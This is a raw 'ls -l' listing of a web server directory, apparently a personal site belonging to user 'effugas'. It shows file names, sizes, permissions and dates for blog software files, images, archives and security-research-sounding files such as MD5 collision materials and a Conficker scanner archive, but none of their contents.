-rw-r--r--    1 effugas  effugas       2305 Feb 28  2008 document.png
drwxr-xr-x    2 effugas  effugas        512 Jul 31  2007 dolphin
-rw-r--r--    1 effugas  effugas       2173 Sep  3  2004 dormant-0.1.tar.gz
-rw-r--r--    1 effugas  effugas       2393 Sep  3  2004 dormant-0.11.tar.gz
-rw-r--r--    1 effugas  effugas      23211 Apr 14  2008 dotclear.php
-rwxr-xr-x    1 effugas  effugas        399 Feb  1  2006 downlevel.html
-rw-r--r--    1 effugas  effugas          0 Jun  1 02:21 downloader.do?c=115814&d=dvp
-rw-r--r--    1 effugas  effugas       5692 Feb 11  2001 doxpara_bw_rs.gif
drwxr-xr-x    2 effugas  effugas        512 Oct 17  2005 dr
-rw-r--r--    1 effugas  effugas         57 Jan 31  2008 drag.gif
-rw-r--r--    1 effugas  effugas      31605 Mar  2  2008 dragdrop.js
drwxr-sr-x    9 effugas  effugas        512 Aug 14  2005 drupal-4.6.3
-rw-r--r--    1 effugas  effugas     458095 Aug 14  2005 drupal-4.6.3.tar.gz
drwxr-sr-x    9 effugas  effugas        512 Nov 24  2007 drupal-5.3
-rwxr-xr-x    1 effugas  effugas    1754439 Sep 16  2005 dsimplex.exe
-rw-r--r--    1 effugas  effugas      10611 Nov 14  2002 dvd.txt
-rw-r--r--    1 effugas  effugas     150788 Sep  2  2004 dxp.tgz
-rwxr-xr-x    1 effugas  effugas       1591 Jul 28  2004 dynup.pl
-rw-r--r--    1 effugas  effugas      34813 Aug 29  2004 ebs_1.mp3
-rw-r--r--    1 effugas  effugas      34813 Aug 29  2004 ebs_2.mp3
-rw-r--r--    1 effugas  effugas       4244 Apr 25  2008 edit-attachment-rows.php
-rw-r--r--    1 effugas  effugas       3064 Jun 16  2008 edit-category-form.php
-rw-r--r--    1 effugas  effugas       2590 Mar 21  2008 edit-comments.js
-rw-r--r--    1 effugas  effugas       8183 May  4  2008 edit-comments.php
-rw-r--r--    1 effugas  effugas      18780 Jun 23  2008 edit-form-advanced.php
-rw-r--r--    1 effugas  effugas       4445 May  4  2008 edit-form-comment.php
-rw-r--r--    1 effugas  effugas       3115 Mar 15  2008 edit-form.php
-rw-r--r--    1 effugas  effugas       4585 May  4  2008 edit-link-categories.php
-rw-r--r--    1 effugas  effugas       2208 May  5  2008 edit-link-category-form.php
-rw-r--r--    1 effugas  effugas      14940 May 30  2008 edit-link-form.php
-rw-r--r--    1 effugas  effugas      14864 Jun  2  2008 edit-page-form.php
-rw-r--r--    1 effugas  effugas       7316 Jun 14  2008 edit-pages.php
-rw-r--r--    1 effugas  effugas       6040 Apr 22  2008 edit-post-rows.php
-rw-r--r--    1 effugas  effugas       1908 May  5  2008 edit-tag-form.php
-rw-r--r--    1 effugas  effugas       4913 May  4  2008 edit-tags.php
-rw-r--r--    1 effugas  effugas       7944 May 27  2008 edit.php
-rw-r--r--    1 effugas  effugas       1939 Jun 19  2008 editable_selects.js
-rw-r--r--    1 effugas  effugas        906 Jun 23  2008 editimage-rtl.css
-rw-r--r--    1 effugas  effugas       3654 Jul  8  2008 editimage.css
-rw-r--r--    1 effugas  effugas      12161 Jul 11  2008 editimage.html
-rw-r--r--    1 effugas  effugas      16793 Jul 11  2008 editimage.js
-rw-r--r--    1 effugas  effugas       7622 Jul 11  2008 editor.js
-rw-r--r--    1 effugas  effugas       1386 Jan 31  2008 editor_plugin.js
-rw-r--r--    1 effugas  effugas      21855 Jun  4  2008 editor_template.js
-rw-r--r--    1 effugas  effugas      38986 Mar  2  2008 effects.js
-rw-r--r--    1 effugas  effugas       1865 Jan 17  2008 embed.js
-rwxr-xr-x    1 effugas  effugas    3199470 Feb 14  2005 emineire.mp3
-rw-r--r--    1 effugas  effugas        270 Dec 13  2004 engine.c
-rwxr-xr-x    1 effugas  effugas        491 Jan 29  2006 enum.html
-rwxr-xr-x    1 effugas  effugas        432 Jan 29  2006 enum.vbs
-rw-r--r--    1 effugas  effugas     180161 Feb 19  2005 envelope.JPG
-rw-r--r--    1 effugas  effugas        194 Feb 21  2008 exe.png
-rw-r--r--    1 effugas  effugas     101554 Oct 12  2005 exerboxing.pdf
-rw-r--r--    1 effugas  effugas      10060 May 20  2008 export.php
drwxr-xr-x    4 effugas  effugas        512 Oct 18  2004 expose
-rw-r--r--    1 effugas  effugas     452914 Jun 17  2004 expose_v3014.zip
-rw-r--r--    1 effugas  effugas         44 Mar 19  2005 f.html
-rw-r--r--    1 effugas  effugas       2935 Nov 17  2005 f4ic_country.txt
-rw-r--r--    1 effugas  effugas        785 Aug 27  2005 fade-butt.png
-rw-r--r--    1 effugas  effugas       1064 Jul  9  2008 fake_index.php
-rwxr-xr-x    1 effugas  effugas        309 Sep 26  2005 fatal.txt
-rw-r--r--    1 effugas  effugas         79 Nov 14  2002 fattest.html
-rw-r--r--    1 effugas  effugas       3464 Feb 13  2008 feed-atom-comments.php
-rw-r--r--    1 effugas  effugas       2431 Apr 22  2008 feed-atom.php
-rw-r--r--    1 effugas  effugas       2084 Dec 25  2007 feed-rdf.php
-rw-r--r--    1 effugas  effugas       1259 Dec 25  2007 feed-rss.php
-rw-r--r--    1 effugas  effugas       2507 Mar 11  2008 feed-rss2-comments.php
-rw-r--r--    1 effugas  effugas       2098 Mar 11  2008 feed-rss2.php
-rw-r--r--    1 effugas  effugas      14425 Jul  3  2008 feed.php
-rw-r--r--    1 effugas  effugas      16638 Jun 25  2008 file.php
-rw-r--r--    1 effugas  effugas    1472486 Aug 21  2005 file_orig.pdf
drwxr-xrwx    4 effugas  effugas        512 Oct 29  2006 files
-rw-r--r--    1 effugas  effugas         56 Jan 22  2006 filter.pl
-rw-r--r--    1 effugas  effugas       2818 Feb  1  2004 finx.c
-rw-r--r--    1 effugas  effugas       6094 Apr 29  2004 first.gif
-rw-r--r--    1 effugas  effugas     173184 Mar 18  2005 fix.exe
-rw-r--r--    1 effugas  effugas        184 Jul 20  2003 fix.txt
-rw-r--r--    1 effugas  effugas     166681 Mar 19  2005 fix.zip
-rw-r--r--    1 effugas  effugas      73236 Jun 24  2002 fix_step1.jpg
-rw-r--r--    1 effugas  effugas      75382 Jun 24  2002 fix_step2.jpg
-rw-r--r--    1 effugas  effugas      17956 Jul  8  2006 flags.png
-rw-r--r--    1 effugas  effugas        241 Jan 17  2008 flash.gif
-rw-r--r--    1 effugas  effugas      11668 Jan 17  2008 flv_player.swf
-rw-r--r--    1 effugas  effugas       1805 Jan 31  2008 fm.gif
-rwxr-xr-x    1 effugas  effugas       7284 Aug 29  2007 fonts.PNG
-rwxr-xr-x    1 effugas  effugas      17045 Aug 29  2007 fonts2.PNG
-rwxr-xr-x    1 effugas  effugas      18363 Aug 30  2007 fonts3.PNG
-rw-r--r--    1 effugas  effugas      10228 Aug 31  2007 fonts4.PNG
-rw-r--r--    1 effugas  effugas      67673 Aug 31  2007 fonts6.PNG
-rwxr-xr-x    1 effugas  effugas      18378 Sep  2  2007 fonts7.PNG
-rw-r--r--    1 effugas  effugas      48746 Aug  7  2008 foo
-rw-r--r--    1 effugas  effugas       1526 Mar 19  2003 foo.html
-rw-r--r--    1 effugas  effugas     137216 Nov 15  2002 foo.ppt
-rw-r--r--    1 effugas  effugas        419 Nov 16  2005 footer.php
drwxr-xr-x    2 effugas  effugas        512 Sep 13  2004 foovid
-rw-r--r--    1 effugas  effugas       5262 Mar 12  2008 form_utils.js
-rw-r--r--    1 effugas  effugas      46384 Jul  8  2008 formatting.php
-rw-r--r--    1 effugas  effugas        851 Apr 18  2008 forms.js
-rw-r--r--    1 effugas  effugas        395 Nov 14  2002 frame2.html
-rw-r--r--    1 effugas  effugas        512 Nov 14  2002 frameok.html
-rw-r--r--    1 effugas  effugas        513 Nov 14  2002 frametb.html
-rw-r--r--    1 effugas  effugas      32672 Oct  9  2005 fsm_brooch.jpg
-rw-r--r--    1 effugas  effugas        127 Apr 16  2006 ftr.html
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 fullscreen
-rw-r--r--    1 effugas  effugas       3408 Jun 27  2008 fullscreen.htm
-rw-r--r--    1 effugas  effugas        769 Jul  1  2001 fulltest.gif
-rw-r--r--    1 effugas  effugas        245 May  4  2007 functions.php
-rw-r--r--    1 effugas  effugas       2023 May 20  2008 functions.wp-scripts.php
-rw-r--r--    1 effugas  effugas       1136 Jun  4  2008 functions.wp-styles.php
-rw-r--r--    1 effugas  effugas     165504 Feb 22  2005 fx.exe
-rw-r--r--    1 effugas  effugas        684 Jul  9  2008 gallery.js
-rw-r--r--    1 effugas  effugas    1339053 Aug 29  2003 games.pdf
-rw-r--r--    1 effugas  effugas        166 Apr 20  2005 gd.html
-rw-r--r--    1 effugas  effugas      16742 May 19  2008 gear.png
-rw-r--r--    1 effugas  effugas      11075 Jul 11  2008 gears-manifest.php
-rw-r--r--    1 effugas  effugas      40000 Jun 11  2008 general-template.php
-rw-r--r--    1 effugas  effugas       2188 Jan 17  2008 general.php
-rw-r--r--    1 effugas  effugas         63 Nov 14  2002 get.html
-rw-r--r--    1 effugas  effugas      11375 Jan  4  2008 gettext.php
-rw-r--r--    1 effugas  effugas     524414 Dec 14  2004 glance.zip
-rw-r--r--    1 effugas  effugas        588 Jul 13  2008 global-rtl.css
-rw-r--r--    1 effugas  effugas       3019 May  8  2008 global.css
-rw-r--r--    1 effugas  effugas        741 Jul 18 06:31 gmap.html
-rw-r--r--    1 effugas  effugas         23 May 10 12:13 googlehostedservice.html
-rw-r--r--    1 effugas  effugas        983 Jan 31  2008 gotmoxie.png
drwxr-xr-x    2 effugas  effugas        512 Aug 23  2005 graphs
-rw-r--r--    1 effugas  effugas      10897 May  4  2008 greymatter.php
-rw-r--r--    1 effugas  effugas     425256 Dec  5  2002 guru.jpg
-rw-r--r--    1 effugas  effugas     433321 Dec  5  2002 guru2.jpg
-rw-r--r--    1 effugas  effugas     132608 Nov 17  2002 gwc3.ppt
-rw-r--r--    1 effugas  effugas       5435 Nov 14  2002 hack_small.jpg
-rw-r--r--    1 effugas  effugas      57096 Mar 11  2002 hackproofing.jpg
-rw-r--r--    1 effugas  effugas       9266 Apr 30  2008 handlers.js
-rw-r--r--    1 effugas  effugas     177831 Sep 27  2005 hank_chinaski.pdf
-rw-r--r--    1 effugas  effugas     611325 Jul 27  2006 hardcorr_1.png
-rw-r--r--    1 effugas  effugas    1737769 Aug 10  2004 haxor_full.jpg
-rw-r--r--    1 effugas  effugas      41091 Aug 10  2004 haxor_plate.jpg
-rw-r--r--    1 effugas  effugas        233 Feb  3  2006 hcp1.html
-rw-r--r--    1 effugas  effugas       2144 Jun 13  2007 header-img.php
-rw-r--r--    1 effugas  effugas       1197 Oct 17  2007 header.php
-rw-r--r--    1 effugas  effugas        427 Mar 16 12:23 headers.php
-rw-r--r--    1 effugas  effugas      46717 Oct  1  2005 heartrate.png
-rw-r--r--    1 effugas  effugas       2021 Jun 16  2008 hello.php
-rw-r--r--    1 effugas  effugas        295 Jan 31  2008 help.gif
-rw-r--r--    1 effugas  effugas        127 Dec 12  2006 heya.html
-rw-r--r--    1 effugas  effugas        324 Feb  2  2006 highband.asx
-rw-r--r--    1 effugas  effugas        315 Feb  2  2006 highband4.asx
-rw-r--r--    1 effugas  effugas        365 Feb  2  2006 highband7.asx
-rw-r--r--    1 effugas  effugas        272 Dec 24  2005 hikids.html
-rw-r--r--    1 effugas  effugas        627 Dec 21  2006 hilite.htc
-rw-r--r--    1 effugas  effugas     290661 Jan 19  2004 hipster.pdf
-rw-r--r--    1 effugas  effugas      76338 Oct 26  2002 hiss1.jpg
-rw-r--r--    1 effugas  effugas      67473 Oct 26  2002 hiss2.jpg
-rw-r--r--    1 effugas  effugas          0 Oct 30  2005 history_of_art.jpg
-rw-r--r--    1 effugas  effugas       8372 Jul  4  2002 hivercon.jpg
-rwxrwxrwx    1 effugas  effugas     797176 Dec 28  2006 hohoketto_0.0001.tar.gz
-rw-r--r--    1 effugas  effugas     193879 Mar 19  2007 hopeful.jpg
-rw-r--r--    1 effugas  effugas        769 Jan 17  2008 horizontal.gif
-rwxr-xr-x    1 effugas  effugas     294774 Aug 13  2006 hr_fourier.png
-rw-r--r--    1 effugas  effugas        537 Feb 21  2008 html.png
drwxr-xr-x    2 effugas  effugas        512 Jan 24  2007 hv
-rw-r--r--    1 effugas  effugas        170 Aug 27  2005 icon_arrow.gif
-rw-r--r--    1 effugas  effugas        172 Aug 27  2005 icon_biggrin.gif
-rw-r--r--    1 effugas  effugas        171 Aug 27  2005 icon_confused.gif
-rw-r--r--    1 effugas  effugas        172 Aug 27  2005 icon_cool.gif
-rw-r--r--    1 effugas  effugas        498 Aug 27  2005 icon_cry.gif
-rw-r--r--    1 effugas  effugas        170 Aug 27  2005 icon_eek.gif
-rw-r--r--    1 effugas  effugas        236 Aug 27  2005 icon_evil.gif
-rw-r--r--    1 effugas  effugas        236 Aug 27  2005 icon_exclaim.gif
-rw-r--r--    1 effugas  effugas        176 Aug 27  2005 icon_idea.gif
-rw-r--r--    1 effugas  effugas        336 Aug 27  2005 icon_lol.gif
-rw-r--r--    1 effugas  effugas        174 Aug 27  2005 icon_mad.gif
-rw-r--r--    1 effugas  effugas        349 Aug 27  2005 icon_mrgreen.gif
-rw-r--r--    1 effugas  effugas        171 Aug 27  2005 icon_neutral.gif
-rw-r--r--    1 effugas  effugas        248 Aug 27  2005 icon_question.gif
-rw-r--r--    1 effugas  effugas        176 Aug 27  2005 icon_razz.gif
-rw-r--r--    1 effugas  effugas        650 Aug 27  2005 icon_redface.gif
-rw-r--r--    1 effugas  effugas        485 Aug 27  2005 icon_rolleyes.gif
-rw-r--r--    1 effugas  effugas        171 Aug 27  2005 icon_sad.gif
-rw-r--r--    1 effugas  effugas        174 Aug 27  2005 icon_smile.gif
-rw-r--r--    1 effugas  effugas        174 Aug 27  2005 icon_surprised.gif
-rw-r--r--    1 effugas  effugas        238 Aug 27  2005 icon_twisted.gif
-rw-r--r--    1 effugas  effugas        170 Aug 27  2005 icon_wink.gif
-rw-r--r--    1 effugas  effugas      11505 Jun  4  2008 icons.gif
-rw-r--r--    1 effugas  effugas        614 Jun 16  2004 id_dsa.pub
-rw-r--r--    1 effugas  effugas        606 Mar 27  2008 ie-rtl.css
-rw-r--r--    1 effugas  effugas       2335 Apr 18  2008 ie.css
-rw-r--r--    1 effugas  effugas         43 Feb  2  2006 if.html
-rw-r--r--    1 effugas  effugas         71 Feb  3  2006 if2.html
-rw-r--r--    1 effugas  effugas         82 Feb  3  2006 if2b.html
-rw-r--r--    1 effugas  effugas        107 Feb  3  2006 if2c.html
-rw-r--r--    1 effugas  effugas         86 Feb  9  2006 if3b.html
-rw-r--r--    1 effugas  effugas         83 Feb  9  2006 if3c.html
-rw-r--r--    1 effugas  effugas          0 Feb 13  2006 if4.html
-rw-r--r--    1 effugas  effugas       1233 Dec 12  2006 ifdom.html
-rw-r--r--    1 effugas  effugas        248 Nov 18  2006 ifr.html
-rw-r--r--    1 effugas  effugas        101 Jul  3  2008 image.gif
-rw-r--r--    1 effugas  effugas       4668 Jun 27  2008 image.htm
-rw-r--r--    1 effugas  effugas       6256 Jun  4  2008 image.js
-rw-r--r--    1 effugas  effugas       2513 Mar 26  2008 image.php
-rw-r--r--    1 effugas  effugas       3701 Jun  9  2008 image.png
drwxr-xr-x    2 effugas  effugas        512 Jul  6  2008 images
drwxr-xr-x    2 effugas  effugas        512 Oct 31  2005 img
-rw-r--r--    1 effugas  effugas         68 Feb  6  2006 img.html
-rw-r--r--    1 effugas  effugas      28093 Jul  4  2002 img.jpg
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2008 import
-rw-r--r--    1 effugas  effugas       1445 Feb 23  2008 import.php
drwxr-sr-x    2 effugas  effugas        512 Nov 15  2005 includes
-rw-r--r--    1 effugas  effugas        514 Feb 21  2008 index-extra.php
-rw-r--r--    1 effugas  effugas      42835 Nov 14  2002 index-old.php
-rw-r--r--    1 effugas  effugas     107182 Sep 22  2008 index.html
-rw-r--r--    1 effugas  effugas        397 Aug 24  2008 index.php
-rw-r--r--    1 effugas  effugas          0 Aug 19  2008 index.php.1
-rw-r--r--    1 effugas  effugas          0 Jul 15  2008 index.php_er_hello
-rw-r--r--    1 effugas  effugas       1064 Jul  8  2008 index2.php
-rwxr-xr-x    1 effugas  effugas       1231 Sep 23  2003 index_old.php
-rw-r--r--    1 effugas  effugas        108 Nov 20  2002 index_orig.php
-rw-r--r--    1 effugas  effugas       1062 Jul  9  2008 index_safe.php
-rw-r--r--    1 effugas  effugas       4727 Apr 18  2008 inline.php
drwxr-xr-x    3 effugas  effugas        512 Aug 19  2008 inlinepopups
drwxr-xr-x    2 effugas  effugas        512 Nov 30  2005 insane_dns
-rw-r--r--    1 effugas  effugas       4043 May 20  2008 install-helper.php
-rw-r--r--    1 effugas  effugas        363 Jul 13  2008 install-rtl.css
-rw-r--r--    1 effugas  effugas       2213 Jul 10  2008 install.css
-rw-r--r--    1 effugas  effugas    1144832 Apr  1  2007 install.msi
-rw-r--r--    1 effugas  effugas       4272 Jul 10  2008 install.php
-rw-r--r--    1 effugas  effugas       2808 Feb 28  2008 interactive.png
-rw-r--r--    1 effugas  effugas      77084 Feb  5  2008 interface.js
-rw-r--r--    1 effugas  effugas      19405 Mar 31  2007 ioa1.html
-rw-r--r--    1 effugas  effugas    1786734 Oct 29  2004 irvid.mpg
-rw-r--r--    1 effugas  effugas      40960 Oct 22  2006 iso
-rw-r--r--    1 effugas  effugas         70 Jan 17  2008 items.gif
-rw-r--r--    1 effugas  effugas        108 Feb  6  2006 its1.html
-rw-r--r--    1 effugas  effugas       5998 Feb 27  2008 jkw.php
drwxr-xr-x    2 effugas  effugas        512 Oct 13  2004 joshvid
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2008 jquery
-rw-r--r--    1 effugas  effugas       4462 Mar  2  2008 jquery.color.js
-rw-r--r--    1 effugas  effugas      31465 Mar  2  2008 jquery.form.js
-rw-r--r--    1 effugas  effugas      31111 Jun  3  2008 jquery.js
-rw-r--r--    1 effugas  effugas       3457 Jan 10  2008 jquery.schedule.js
drwxr-xr-x    2 effugas  effugas        512 Jul  8  2008 js
-rw-r--r--    1 effugas  effugas        517 Feb 21  2008 js.png
-rw-r--r--    1 effugas  effugas       1926 Jul 21  2007 jsonmin.js
drwxrwxrwx    2 effugas  effugas        512 Sep  7  2007 k256
-rwxr-xr-x    1 effugas  effugas       3147 Aug 31  2005 katblog_nopw.pl
-rw-r--r--    1 effugas  effugas     178092 Feb 21  2003 kde31.png
-rw-r--r--    1 effugas  effugas    4840158 Jul 22  2006 kern_multi.png
-rw-r--r--    1 effugas  effugas      30293 May 20  2008 kses.php
-rw-r--r--    1 effugas  effugas       1043 Mar 19  2007 kubrickbg-ltr.jpg
-rw-r--r--    1 effugas  effugas       1657 Mar 19  2007 kubrickbg-rtl.jpg
-rw-r--r--    1 effugas  effugas        556 Feb 15  2005 kubrickbgcolor.jpg
-rw-r--r--    1 effugas  effugas       1014 Feb 15  2005 kubrickbgwide.jpg
-rw-r--r--    1 effugas  effugas       2443 Feb 15  2005 kubrickfooter.jpg
-rw-r--r--    1 effugas  effugas       7868 Feb 15  2005 kubrickheader.jpg
-rw-r--r--    1 effugas  effugas       9809 Jun  9  2008 l10n.php
drwxr-xr-x    2 effugas  effugas        512 Aug 19  2008 langs
-rw-r--r--    1 effugas  effugas      78480 Sep 15  2003 latency_scan.txt
-rw-r--r--    1 effugas  effugas    1304725 Aug 24  2008 latest.tar.gz
-rw-r--r--    1 effugas  effugas    1511562 Jul 15  2008 latest.zip
-rw-r--r--    1 effugas  effugas        431 Feb  2  2006 launch6.wvx
-rw-r--r--    1 effugas  effugas  122535853 Jun 20  2007 lauren.zip
-rw-r--r--    1 effugas  effugas       1485 Nov 15  2002 layout-tail.inc
-rw-r--r--    1 effugas  effugas        514 Nov 14  2002 layout.inc
-rwxr-xr-x    1 effugas  effugas      12691 Nov 15  2002 lc.c
-rw-r--r--    1 effugas  effugas        184 Jul  1  2001 left.gif
-rwxr-xr-x    1 effugas  effugas       5658 Sep 18  2004 less.tgz
-rw-r--r--    1 effugas  effugas     530612 Jul 24  2005 lfl_fr.zip
-rw-r--r--    1 effugas  effugas    1197468 Dec 23  2005 lfl_fr_alpha.zip
drwxr-xr-x    2 effugas  effugas        512 May 19  2005 lfl_v1
-rw-r--r--    1 effugas  effugas    9410414 May  2  2005 lfl_v1_alpha.zip
drwxr-xr-x    2 effugas  effugas        512 Oct 15  2003 lgl
-rw-r--r--    1 effugas  effugas      15407 Aug 24  2008 license.txt
-rw-r--r--    1 effugas  effugas      34837 Jan 16  2007 limo.jpg
-rw-r--r--    1 effugas  effugas        691 May 20  2008 link-add.php
-rw-r--r--    1 effugas  effugas       2156 Mar 26  2008 link-category.php
-rw-r--r--    1 effugas  effugas       4030 May  4  2008 link-import.php
-rw-r--r--    1 effugas  effugas       7507 May  4  2008 link-manager.php
-rw-r--r--    1 effugas  effugas       1760 May 20  2008 link-parse-opml.php
-rw-r--r--    1 effugas  effugas      26020 Jul 14  2008 link-template.php
-rw-r--r--    1 effugas  effugas       2657 Jun 27  2008 link.htm
-rw-r--r--    1 effugas  effugas       1739 May 30  2008 link.js
-rw-r--r--    1 effugas  effugas       2397 May 20  2008 link.php
-rw-r--r--    1 effugas  effugas        189 Jan 28  2008 links.php
-rw-r--r--    1 effugas  effugas      16030 Dec 31  2003 lips1.jpg
-rw-r--r--    1 effugas  effugas      50034 Dec 15  2003 little_big_man.txt
-rw-r--r--    1 effugas  effugas       5660 Feb 29  2008 livejournal.php
-rw-r--r--    1 effugas  effugas       1849 Jun 17  2008 loading-publish.gif
-rw-r--r--    1 effugas  effugas       2530 May 13  2008 loading.gif
-rw-r--r--    1 effugas  effugas       5886 Jan  9  2008 loadingAnimation.gif
-rw-r--r--    1 effugas  effugas         51 Feb  9  2006 local.html
-rw-r--r--    1 effugas  effugas       9533 Jan 10  2008 locale.php
-rw-r--r--    1 effugas  effugas    3081047 Feb 23  2006 location_set_dns2.tar.gz.gpg
-rw-r--r--    1 effugas  effugas       6747 Feb 13  2005 lock2.html
-rwxr-xr-x    1 effugas  effugas        810 Feb  5  2005 lockmart.html
-rw-r--r--    1 effugas  effugas      12391 Feb  5  2005 lockmart.js
-rw-r--r--    1 effugas  effugas        476 Jul 13  2008 login-rtl.css
-rw-r--r--    1 effugas  effugas       1436 Mar  8  2008 login.css
-rw-r--r--    1 effugas  effugas        141 Nov 14  2002 login.html
drwxr-xr-x    2 effugas  effugas        512 Oct 17  2005 logo
-rw-r--r--    1 effugas  effugas        880 Dec 22  2007 logo-ghost.png
-rw-r--r--    1 effugas  effugas       3184 Feb 19  2008 logo-login.gif
-rw-r--r--    1 effugas  effugas       1238 May 19  2008 logo.gif
-rw-r--r--    1 effugas  effugas      13266 Mar 17  2003 logo3.jpg
-rwxr-xr-x    1 effugas  effugas    3748783 Sep 29  2008 love.png
-rwxr-xr-x    1 effugas  effugas    3372118 Sep 30  2008 love2.jpg
drwxr-xr-x    2 effugas  effugas        512 Jul 15  2007 ludivu
-rw-r--r--    1 effugas  effugas      73525 Jul 16  2007 ludivu_alpha.zip
-rw-r--r--    1 effugas  effugas        207 Jul 25  2008 macFFBgHack.png
-rw-r--r--    1 effugas  effugas       2667 Jul 16  2004 maddns.pl
-rw-r--r--    1 effugas  effugas      18993 Jun  1  2005 mainimg.jpg
-rw-r--r--    1 effugas  effugas      55457 Jun  6  2004 malta.jpg
-rw-r--r--    1 effugas  effugas    5578752 Aug  8  2006 mario3.png
-rwx------    1 effugas  effugas     481817 Sep  1  2007 marker.html
-rw-r--r--    1 effugas  effugas      92904 Sep  1  2007 marker1.png
-rw-r--r--    1 effugas  effugas      92212 Sep  1  2007 marker2.png
-rw-r--r--    1 effugas  effugas     113739 Sep  1  2007 markerfelt.png
-rw-r--r--    1 effugas  effugas       1125 Dec  7  2006 marqueeHoriz.gif
-rw-r--r--    1 effugas  effugas       1141 Dec  7  2006 marqueeVert.gif
-rw-r--r--    1 effugas  effugas     103426 Oct 14  2003 mass_scan.lvhist.gz
-rwxr-xr-x    1 effugas  effugas    2976737 Sep 30  2008 matrix.jpg
drwxr-xr-x    2 effugas  effugas       1024 Aug 30  2005 mcfrontalot
-rw-r--r--    1 effugas  effugas       4120 Jan 17  2008 mclayer.js
-rw-r--r--    1 effugas  effugas       1786 Jun  4  2008 mctabs.js
-rwxr-xr-x    1 effugas  effugas       8458 Dec 13  2004 md5.c
-rw-r--r--    1 effugas  effugas      79285 Dec  8  2004 md5_anim.gif
-rw-r--r--    1 effugas  effugas      43311 Dec  8  2004 md5_anim2.gif
-rw-r--r--    1 effugas  effugas       4411 Dec  8  2004 md5_diff3.png
-rw-r--r--    1 effugas  effugas      55898 Dec  6  2004 md5_someday.pdf
-rw-r--r--    1 effugas  effugas      55831 Dec  8  2004 md5_vec1.png
-rw-r--r--    1 effugas  effugas      28758 Dec  8  2004 md5_vec1.txt
-rw-r--r--    1 effugas  effugas      51554 Dec  8  2004 md5_vec2.png
-rw-r--r--    1 effugas  effugas      28758 Dec  8  2004 md5_vec2.txt
-rw-r--r--    1 effugas  effugas      69848 Jan 19  2006 md5coll_view.c
-rw-r--r--    1 effugas  effugas       1650 Aug 29  2004 md5test.pl
drwxr-xr-x    5 effugas  effugas        512 Aug 19  2008 media
-rw-r--r--    1 effugas  effugas         72 Feb 10  2008 media-button-gallery.gif
-rw-r--r--    1 effugas  effugas         69 Feb 10  2008 media-button-image.gif
-rw-r--r--    1 effugas  effugas        188 Feb 10  2008 media-button-music.gif
-rw-r--r--    1 effugas  effugas        141 Feb 10  2008 media-button-other.gif
-rw-r--r--    1 effugas  effugas         68 Feb 10  2008 media-button-video.gif
-rw-r--r--    1 effugas  effugas        723 Feb 10  2008 media-buttons.gif
-rw-r--r--    1 effugas  effugas        367 Mar 19  2008 media-rtl.css
-rw-r--r--    1 effugas  effugas       1681 Jul 11  2008 media-upload.js
-rw-r--r--    1 effugas  effugas       1141 Mar 10  2008 media-upload.php
-rw-r--r--    1 effugas  effugas       4830 Jul  9  2008 media.css
-rw-r--r--    1 effugas  effugas        149 Jul  3  2008 media.gif
-rw-r--r--    1 effugas  effugas      32147 Jun 27  2008 media.htm
-rw-r--r--    1 effugas  effugas      17903 Jun  4  2008 media.js
-rw-r--r--    1 effugas  effugas      52773 Jul 12  2008 media.php
-rw-r--r--    1 effugas  effugas       5920 Jun  4  2008 menu-header.php
-rw-r--r--    1 effugas  effugas       6629 Jul 10  2008 menu.php
-rw-r--r--    1 effugas  effugas         68 Jan 17  2008 menu_arrow.gif
-rw-r--r--    1 effugas  effugas         70 Jan 17  2008 menu_check.gif
-rwxr-xr-x    1 effugas  effugas      47959 Jun 11  2006 mercury.txt
-rwxr-xr-x    1 effugas  effugas       1227 Oct 17  2005 meta_index.php
-rw-r--r--    1 effugas  effugas    3445822 Jul 31  2006 mfc44u.png
-rw-r--r--    1 effugas  effugas        406 Jul  1  2001 middle.gif
-rw-r--r--    1 effugas  effugas         87 Jul  1  2001 midsmall.gif
-rw-r--r--    1 effugas  effugas      12159 Feb 11  2001 minbar_gimp.jpg
-rw-r--r--    1 effugas  effugas      12181 Feb 11  2001 minbar_netscape.jpg
-rw-r--r--    1 effugas  effugas      12275 Feb 11  2001 minbar_xterm.jpg
drwxr-sr-x    2 effugas  effugas       1024 Oct 17  2005 misc
-rw-r--r--    1 effugas  effugas       4477 Jul  1  2008 misc.php
-rw-r--r--    1 effugas  effugas   31958646 May 22  2007 ml.zip
-rw-r--r--    1 effugas  effugas        100 May 20  2008 moderation.php
drwxr-sr-x    7 effugas  effugas       1024 Nov 17  2005 modules
-rw-r--r--    1 effugas  effugas        108 Jan 31  2008 more.gif
-rw-r--r--    1 effugas  effugas        146 Jan 31  2008 more_bug.gif
-rw-r--r--    1 effugas  effugas     118694 Aug  9  2004 mousetrap.jpg
-rw-r--r--    1 effugas  effugas    1530411 Jul 31  2006 msvc771.png
drwxr-xr-x   14 effugas  effugas       1024 Sep 26  2005 mt
-rw-r--r--    1 effugas  effugas      15140 May 27  2008 mt.php
drwxr-xr-x    2 effugas  effugas        512 Dec 21  2006 my
drwxr-xr-x    6 effugas  effugas       3072 Jan 21  2005 myagency
-rw-r--r--    1 effugas  effugas    1167179 Jan 21  2005 myagency.zip
-rw-r--r--    1 effugas  effugas    1164540 Jan 21  2005 myagency2.zip
-rw-r--r--    1 effugas  effugas    1187786 Jan 21  2005 myagency4.zip
drwxrwxrwx    4 effugas  effugas        512 Jan 22  2007 mys
-rw-r--r--    1 effugas  effugas      43218 Jan 24  2007 mys.jpg
drwxr-xr-x    2 effugas  effugas        512 Jan 17  2007 mys2
-rwx------    1 effugas  effugas       1763 Jan 22  2007 mys_swf
drwxrwxrwx    2 effugas  effugas        512 Feb 16  2007 mys_wmp
-rw-r--r--    1 effugas  effugas     938856 Nov 11  2003 n2.exe
-rw-r--r--    1 effugas  effugas     918576 Nov 11  2003 nachi2000.exe
-rw-r--r--    1 effugas  effugas        529 Jul 21  2004 name.c
-rw-r--r--    1 effugas  effugas       2275 Nov 14  2002 nasa.txt
-rw-r--r--    1 effugas  effugas      15935 Apr 18  2008 native.php
-rw-r--r--    1 effugas  effugas    2707776 Aug 30  2005 nerdpower.avi
-rw-r--r--    1 effugas  effugas        373 Feb  8  2006 netl.html
-rw-r--r--    1 effugas  effugas      71840 Oct 14  2003 netmap_a.swf
drwxr-xr-x    7 effugas  effugas        512 Jul  7  2003 new
-rw-r--r--    1 effugas  effugas       2376 Aug 27  2004 ngdebug.c
-rwxr-xr-x    1 effugas  effugas      53253 Mar 30 08:55 nmap-conficker.zip
-rw-r--r--    1 effugas  effugas      45563 Feb 11  2001 nnshot.jpg
